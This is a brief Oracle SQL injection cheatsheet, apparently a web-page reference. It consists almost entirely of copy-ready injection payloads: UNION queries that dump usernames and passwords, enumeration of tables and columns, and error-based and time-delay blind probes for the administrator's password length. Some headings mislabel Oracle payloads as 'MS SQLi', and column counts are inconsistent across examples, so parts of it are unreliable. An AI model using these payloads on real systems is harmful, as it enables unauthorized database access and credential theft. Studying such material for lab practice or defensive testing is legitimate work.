Basic Oracle SQLi Cheatsheet
Oracle SQl Injection Cheatsheet
Retrieving Database version
SELECT banner FROM v$version
SELECT version FROM v$instance
UNION SQLi Context
' UNION SELECT NULL,banner FROM v$version -- -
' UNION SELECT NULL,version FROM v$version
Note: In UNION Statement we have to match the number of columns of first select statement so that's why we use one NULL in the payload you can modify that according to your requirements
String Concatenation
'string1' || 'string2'
SELECT username || ":" || password FROM users;
In a UNION SQLi Context
' UNION SELECT NULL,username || ":" || password FROM Users -- -
Substring
SELECT SUBSTR(password,2,1) FROM users
In the UNION SQLi context
' UNION SELECT SUBSTR(password,2,1) FROM users -- -
Comments
--comment
Database Contents
List All Tables
SELECT table_name FROM all_tables;
In a UNION Oracle SQLi context
' UNION SELECT NULL,table_name FROM all_tables -- -
List All Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
In UNION MS SQLi
' UNION SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' -- -
Conditional Errors
SELECT CASE WHEN LENGTH(password) = 3 THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator'
In UNION MS SQLi
' UNION SELECT NULL,NULL,CASE WHEN LENGTH(password)=FUZZ THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator'
Time delays
dbms_pipe.receive_message(('a'),10)
Conditional Time delays
SELECT CASE WHEN (LENGTH(password) = 3) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM users where username = 'administrator'
In UNION Oracle SQLi
' UNION SELECT NULL,NULL,CASE WHEN (LENGTH(password) = 3) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM users where username = 'administrator'
Last updated
Was this helpful?